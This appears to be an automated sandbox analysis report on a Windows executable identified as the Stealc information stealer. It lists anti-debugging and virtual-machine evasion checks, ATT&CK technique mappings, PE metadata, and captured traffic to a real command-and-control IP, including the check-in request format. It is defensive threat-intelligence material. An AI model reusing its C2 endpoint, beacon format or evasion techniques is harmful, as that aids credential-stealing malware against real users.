                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0014F68A FindFirstFileA, 0_2_0014F68A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0014F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0014F6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00153EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00153EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_001416D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00141160 GetSystemInfo,ExitProcess, 0_2_00141160
                Source: file.exe, file.exe, 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2171497374.0000000000E34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWy
                Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2171497374.0000000000E34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2171497374.0000000000E01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`q
                Source: file.exe, 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13744
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13741
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13759
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13755
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13795
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001445C0 VirtualProtect ?,00000004,00000100,00000000 0_2_001445C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00159860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00159860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00159750 mov eax, dword ptr fs:[00000030h] 0_2_00159750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00157850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00157850
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara match | File source: Process Memory Space: file.exe PID: 2796, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00159600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, | 0_2_00159600
                Source: file.exe, file.exe, 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: E1Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_00157B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00156920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, | 0_2_00156920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00157850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00157850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00157A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, | 0_2_00157A30

                Stealing of Sensitive Information

                barindex
                Source: Yara match | File source: 0.2.file.exe.140000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2125087117.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 2796, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara match | File source: 0.2.file.exe.140000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2125087117.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 2796, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                             Source | Detection | Scanner | Label | Link
                             file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                             file.exe | 100% | Joe Sandbox ML
                             No Antivirus matches
                             No Antivirus matches
                             No Antivirus matches
                             Source | Detection | Scanner | Label | Link
                             http://185.215.113.37/ | 100% | URL Reputation | malware
                             http://185.215.113.37 | 100% | URL Reputation | malware
                             http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                             No contacted domains info
                             Name | Malicious | Antivirus Detection | Reputation
                             http://185.215.113.37/ | true | URL Reputation: malware | unknown
                             http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                             Name | Source | Malicious | Antivirus Detection | Reputation
                             http://185.215.113.37/e2b1563c6670f193.phpn | file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                             http://185.215.113.37/e2b1563c6670f193.phpb | file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                             http://185.215.113.37 | file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                             http://185.215.113.37/r | file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                             http://185.215.113.37/e2b1563c6670f193.phpV | file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                             http://185.215.113.37/G | file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                             http://185.215.113.37/e2b1563c6670f193.phpm: | file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                             • No. of IPs < 25%
                             • 25% < No. of IPs < 50%
                             • 50% < No. of IPs < 75%
                             • 75% < No. of IPs
                             IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                             185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1540851
                            Start date and time:2024-10-24 09:06:07 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 13s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 89
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 20.12.23.50
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
                             Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                             185.215.113.37 | g4Cyr2T5jq.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | LummaC, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             No context
                             Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                             WHOLESALECONNECTIONSNL | g4Cyr2T5jq.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | Browse | 185.215.113.16
                             | msqT9atzYW.exe | Get hash | malicious | Amadey | Browse | 185.215.113.43
                             | file.exe | Get hash | malicious | LummaC, Stealc | Browse | 185.215.113.16
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
                             No context
                             No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947723498064361
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'854'464 bytes
                            MD5:c4d992e32dabd4723370d920a842d759
                            SHA1:e2ba688cb7d4a7c88c964ec875e62529d63057c7
                            SHA256:fc379207ec04489ab7610663a20efa6827c0ff39c842335048fccc15f202c447
                            SHA512:ec911f4ae4534824e15a584ccd1c181270640e2b8367a6f59bf0f49fce158de0a1e4eb60abb10edcd7a3bd0e7e86c84d44af5d90f925d4ad7c77448658b5d5f9
                            SSDEEP:49152:QaWIelCd4Q3JYPh9rF4w5vt8J/UmG3WQh7X4:QaWIec3CHiwZqJ/IWqL
                            TLSH:46853390DE54AAA7D00E6DF258EFBE0116791859C3F1CFA0F90C53F9999AF6C61036C2
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xaa3000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                             Name | Virtual Address | Virtual Size | Is in Section
                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                             | 0x1000 | 0x25b000 | 0x22800 | 7689d4696bedf0ba50c6bbae169c706d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             | 0x25e000 | 0x2a5000 | 0x200 | f62253704cd35d392778e542c535953f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             wyvqzkuk | 0x503000 | 0x19f000 | 0x19ea00 | 6c92cb69f3b9c20510abe5336b0a29e1 | False | 0.9950803860792885 | data | 7.95409499130381 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             kejrglww | 0x6a2000 | 0x1000 | 0x400 | 8a87b9efff9775c83d44f6883d19e997 | False | 0.744140625 | data | 5.9207355016908965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .taggant | 0x6a3000 | 0x3000 | 0x2200 | 84a9bd204f61dc511d5c57b5c608f11a | False | 0.06594669117647059 | DOS executable (COM) | 0.7708342444230577 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             DLL | Import
                             kernel32.dll | lstrcpy
                             Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                             2024-10-24T09:07:10.837642+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                             Oct 24, 2024 09:07:09.602762938 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                             Oct 24, 2024 09:07:09.608441114 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                             Oct 24, 2024 09:07:09.608527899 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                             Oct 24, 2024 09:07:09.608680010 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                             Oct 24, 2024 09:07:09.614025116 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                             Oct 24, 2024 09:07:10.534313917 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                             Oct 24, 2024 09:07:10.534498930 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                             Oct 24, 2024 09:07:10.543632984 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                             Oct 24, 2024 09:07:10.549024105 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                             Oct 24, 2024 09:07:10.837333918 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                             Oct 24, 2024 09:07:10.837641954 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                             Oct 24, 2024 09:07:14.446043015 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                             • 185.215.113.37
                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                             0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 2796 | C:\Users\user\Desktop\file.exe
                             Timestamp | Bytes transferred | Direction | Data
                             Oct 24, 2024 09:07:09.608680010 CEST | 89 | OUT | GET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                             Oct 24, 2024 09:07:10.534313917 CEST | 203 | IN | HTTP/1.1 200 OK
                            Date: Thu, 24 Oct 2024 07:07:10 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                             Oct 24, 2024 09:07:10.543632984 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----EHJJKFCBGIDGHIECGCBK
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Ascii: ------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="hwid"86C5843EB3592398989009------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="build"doma------EHJJKFCBGIDGHIECGCBK--
                             Oct 24, 2024 09:07:10.837333918 CEST | 210 | IN | HTTP/1.1 200 OK
                            Date: Thu, 24 Oct 2024 07:07:10 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=



                            Target ID:0
                            Start time:03:07:05
                            Start date:24/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x140000
                            File size:1'854'464 bytes
                            MD5 hash:C4D992E32DABD4723370D920A842D759
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2125087117.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:7.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
                              execution_graph (interactive node/edge dump condensed; the call chains it records, listed by function address in order of first appearance):
                              • 1569f0 → 142260: the routine 1445c0 (RtlAllocateHeap, VirtualProtect) is invoked in a long unbroken sequence, and again from 1426a0 through 1445a9; this is the per-string allocate-and-decrypt pattern behind the "potential string decryption / allocating functions" signature
                              • 159860: GetPEB at 159750, then 159a93 LoadLibraryA ×5 followed by a run of GetProcAddress calls (159af4 … 159b92); a second resolver at 159c10 (159c20, 43 API calls; 15a036 … 15a6a7, further GetProcAddress runs) completes the dynamic import resolution
                              • 15a740 / 15a7a0 / 15a8a0 / 15a820: lstrcpy and lstrlen helpers; 15a9b0: lstrlen, lstrcpy, lstrcat
                              • 1411d0: environment gates, each branching to ExitProcess on failure: 141160 GetSystemInfo (exit at 14117c); 141110 GetCurrentProcess, VirtualAllocExNuma (exit at 141141); 1410a0 VirtualAlloc, VirtualFree; 1589b0 / 141233 GlobalMemoryStatusEx, __aulldiv (exit at 141292); 156770 GetUserDefaultLangID with five separate ExitProcess exits at 1567a3, 1567ad, 1567b7, 1567c1, 1567cb; 1578e0 GetProcessHeap, RtlAllocateHeap, GetComputerNameA; 157850 GetProcessHeap, RtlAllocateHeap, GetUserNameA (exit at 1411c4)
                              • 156a64 … 156b0c: OpenEventA; if the event exists, CloseHandle and Sleep, otherwise CreateEventA; then 156920 GetSystemTime, string assembly via 156820, sscanf, SystemTimeToFileTime ×2 at 1569aa, with ExitProcess at 1569d8 on the failing branch (a build expiry check)
                              • 155b10 …: 157500 GetWindowsDirectoryA; 144880; 1517a0; 145960 (34 API calls); 151050; 150d90; 150f40; 151a10; 144fb0 GetProcessHeap, RtlAllocateHeap, InternetOpenA; 150740
                              • 155510 … 155a52: server-response handling loop with StrCmpCA comparisons at 155643, 1556a0, 15578a, 155856, 15593f and 155a0b, Sleep at 155a16, 1551f0 (20 API calls) and 1552c0 (25 API calls)
                              (dump truncated at node 14768)
141670 lstrcpy 14767->14768 14768->14770 14769->14751 14770->13823 14772 157553 GetVolumeInformationA 14771->14772 14773 15754c 14771->14773 14774 157591 14772->14774 14773->14772 14775 1575fc GetProcessHeap RtlAllocateHeap 14774->14775 14776 157619 14775->14776 14777 157628 wsprintfA 14775->14777 14779 15a740 lstrcpy 14776->14779 14778 15a740 lstrcpy 14777->14778 14780 155da7 14778->14780 14779->14780 14780->13844 14782 15a7a0 lstrcpy 14781->14782 14783 144899 14782->14783 15835 1447b0 14783->15835 14785 1448a5 14786 15a740 lstrcpy 14785->14786 14787 1448d7 14786->14787 14788 15a740 lstrcpy 14787->14788 14789 1448e4 14788->14789 14790 15a740 lstrcpy 14789->14790 14791 1448f1 14790->14791 14792 15a740 lstrcpy 14791->14792 14793 1448fe 14792->14793 14794 15a740 lstrcpy 14793->14794 14795 14490b InternetOpenA StrCmpCA 14794->14795 14796 144944 14795->14796 14797 144ecb InternetCloseHandle 14796->14797 15841 158b60 14796->15841 14799 144ee8 14797->14799 15856 149ac0 CryptStringToBinaryA 14799->15856 14800 144963 15849 15a920 14800->15849 14803 144976 14805 15a8a0 lstrcpy 14803->14805 14810 14497f 14805->14810 14806 15a820 2 API calls 14807 144f05 14806->14807 14809 15a9b0 4 API calls 14807->14809 14808 144f27 ctype 14813 15a7a0 lstrcpy 14808->14813 14811 144f1b 14809->14811 14814 15a9b0 4 API calls 14810->14814 14812 15a8a0 lstrcpy 14811->14812 14812->14808 14825 144f57 14813->14825 14815 